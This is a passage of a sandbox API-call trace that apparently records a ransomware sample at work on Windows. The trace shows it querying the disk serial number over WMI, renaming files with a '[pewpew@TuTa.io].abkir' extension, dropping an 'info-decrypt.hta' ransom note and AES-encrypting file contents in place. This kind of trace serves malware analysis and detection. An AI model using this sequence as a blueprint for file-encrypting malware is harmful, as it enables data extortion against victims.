[0204.572] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x3 [0204.572] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x2 [0204.572] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0204.572] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.572] IWbemServices:GetObject (in: This=0x60332c4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x6028b10, ppCallResult=0x0) returned 0x0 [0204.704] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f80, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0204.704] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0204.705] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0204.705] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3711328*=0, plFlavor=0x371132c*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3711328*=8, plFlavor=0x371132c*=0) returned 0x0 [0204.705] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.705] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.705] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3711328*=8, plFlavor=0x371132c*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3711328*=8, plFlavor=0x371132c*=0) returned 0x0 [0204.705] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.705] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.705] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll", lpFilePart=0x0) returned 0x3c [0204.705] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x5f [0204.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0204.705] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x60d54030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3339c760, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0205.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0205.137] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0205.529] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL", lpFilePart=0x0) returned 0x40 [0205.529] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\info-decrypt.hta", lpFilePart=0x0) returned 0x44 [0205.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0205.529] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93d20, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x32b93d20, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x32b93d20, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0205.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0205.529] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL", lpFilePart=0x0) returned 0x40 [0205.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0205.530] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), fInfoLevelId=0x0, lpFileInformation=0x366c5d4 | out: lpFileInformation=0x366c5d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3e47200, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x522dc930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe3e47200, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x1bf200)) returned 1 [0205.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0205.530] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL", lpFilePart=0x0) returned 0x40 [0205.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0205.530] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0205.530] GetFileType (hFile=0x32c) returned 0x1 [0205.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0205.530] GetFileType (hFile=0x32c) returned 0x1 [0205.530] GetFileSize (in: hFile=0x32c, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x1bf200 [0205.537] ReadFile (in: hFile=0x32c, lpBuffer=0xab422f8, nNumberOfBytesToRead=0x1bf200, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0xab422f8*, lpNumberOfBytesRead=0x6d8edac*=0x1bf200, lpOverlapped=0x0) returned 1 [0205.772] CloseHandle (hObject=0x32c) returned 1 [0205.773] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbdf480) returned 1 [0205.774] CryptGenRandom (in: hProv=0xbdf480, dwLen=0x10, pbBuffer=0x36ad2f0 | out: pbBuffer=0x36ad2f0) returned 1 [0206.150] CryptImportKey (in: hProv=0xbdf480, pbData=0x3632e64, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7fb50) returned 1 [0206.150] CryptContextAddRef (hProv=0xbdf480, pdwReserved=0x0, dwFlags=0x0) returned 1 [0206.150] CryptContextAddRef (hProv=0xbdf480, pdwReserved=0x0, dwFlags=0x0) returned 1 [0206.150] CryptDuplicateKey (in: hKey=0xb7fb50, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f1d0) returned 1 [0206.150] CryptContextAddRef (hProv=0xbdf480, pdwReserved=0x0, dwFlags=0x0) returned 1 [0206.150] CryptSetKeyParam (hKey=0xb7f1d0, dwParam=0x4, pbData=0x3632f44*=0x1, dwFlags=0x0) returned 1 [0206.150] CryptSetKeyParam (hKey=0xb7f1d0, dwParam=0x1, pbData=0x3632f10, dwFlags=0x0) returned 1 [0206.158] CryptEncrypt (in: hKey=0xb7f1d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xad01518*, pdwDataLen=0x6d8ed78*=0x1bf210, dwBufLen=0x1bf210 | out: pbData=0xad01518*, pdwDataLen=0x6d8ed78*=0x1bf210) returned 1 [0206.251] CryptEncrypt (in: hKey=0xb7f1d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3632f6c*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x3632f6c*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0206.253] CryptDestroyKey (hKey=0xb7fb50) returned 1 [0206.253] CryptReleaseContext (hProv=0xbdf480, dwFlags=0x0) returned 1 [0206.253] CryptReleaseContext (hProv=0xbdf480, dwFlags=0x0) returned 1 [0206.253] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL", lpFilePart=0x0) returned 0x40 [0206.253] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0206.253] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0206.262] GetFileType (hFile=0x31c) returned 0x1 [0206.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0206.262] GetFileType (hFile=0x31c) returned 0x1 [0206.262] WriteFile (in: hFile=0x31c, lpBuffer=0x367f5e4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x367f5e4*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0206.263] CloseHandle (hObject=0x31c) returned 1 [0206.263] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0206.263] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0206.264] CoTaskMemFree (pv=0xbed438) [0206.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0206.264] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0206.264] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0206.264] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0206.264] IUnknown:Release (This=0xb51e34) returned 0x1 [0206.266] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x6027390) returned 0x0 [0206.266] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027390, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0206.266] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027390, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x6029e30) returned 0x0 [0206.266] WbemDefPath:IUnknown:Release (This=0x6027390) returned 0x0 [0206.266] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x6029e30) returned 0x0 [0206.266] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0206.267] WbemDefPath:IUnknown:AddRef (This=0x6029e30) returned 0x3 [0206.267] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0206.267] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0206.267] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0xbdeec0) returned 0x0 [0206.267] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdeec0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.267] WbemDefPath:IUnknown:Release (This=0xbdeec0) returned 0x3 [0206.267] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0206.267] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0206.267] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0206.267] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x2 [0206.267] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x1 [0206.267] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0206.267] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0206.267] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x6029e30) returned 0x0 [0206.267] WbemDefPath:IUnknown:AddRef (This=0x6029e30) returned 0x3 [0206.267] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x2 [0206.267] WbemDefPath:IWbemPath:SetText (This=0x6029e30, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.268] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029e30, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0206.268] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, pszText=0x0) returned 0x0 [0206.268] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.268] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029e30, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0206.268] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029e30, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0206.268] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029e30, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0206.268] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029e30, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0206.268] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029e30, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0206.268] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0206.268] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0206.268] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.268] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0206.268] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0206.268] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0206.268] IUnknown:Release (This=0xb51e34) returned 0x1 [0206.269] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x60273b0) returned 0x0 [0206.269] WbemDefPath:IUnknown:QueryInterface (in: This=0x60273b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0206.269] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60273b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x6029ea0) returned 0x0 [0206.269] WbemDefPath:IUnknown:Release (This=0x60273b0) returned 0x0 [0206.269] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x6029ea0) returned 0x0 [0206.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0206.270] WbemDefPath:IUnknown:AddRef (This=0x6029ea0) returned 0x3 [0206.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0206.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0206.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0xbdeee0) returned 0x0 [0206.270] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdeee0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.270] WbemDefPath:IUnknown:Release (This=0xbdeee0) returned 0x3 [0206.270] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0206.270] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0206.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0206.270] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x2 [0206.270] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x1 [0206.270] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0206.270] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0206.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x6029ea0) returned 0x0 [0206.270] WbemDefPath:IUnknown:AddRef (This=0x6029ea0) returned 0x3 [0206.271] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x2 [0206.271] WbemDefPath:IWbemPath:SetText (This=0x6029ea0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0206.271] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ea0, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0206.271] WbemDefPath:IWbemPath:GetText (in: 